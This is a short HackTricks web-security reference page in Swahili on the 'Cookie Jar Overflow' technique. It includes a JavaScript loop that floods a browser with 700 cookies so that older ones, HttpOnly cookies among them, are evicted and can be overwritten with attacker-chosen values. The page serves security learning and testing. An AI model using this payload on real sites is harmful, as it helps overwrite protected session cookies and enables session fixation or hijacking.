Cookie Jar Overflow

Support HackTricks

Browsers zina kikomo cha idadi ya cookies ambazo zinaweza kuhifadhiwa kwa ukurasa. Kisha, ikiwa kwa sababu fulani unahitaji kufanya cookie ipotee, unaweza kujaa jar la cookie kwani zile za zamani zitaondolewa kwanza:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Kumbuka, kwamba vidakuzi vya upande wa tatu vinavyotaja jina tofauti la kikoa havitafutwa.

Shambulio hili linaweza pia kutumika kufuta vidakuzi vya HttpOnly kwani unaweza kuvifuta kisha kuviweka tena kwa thamani unayotaka.

Angalia hii katika hiki kipande na maabara.

Support HackTricks

Last updated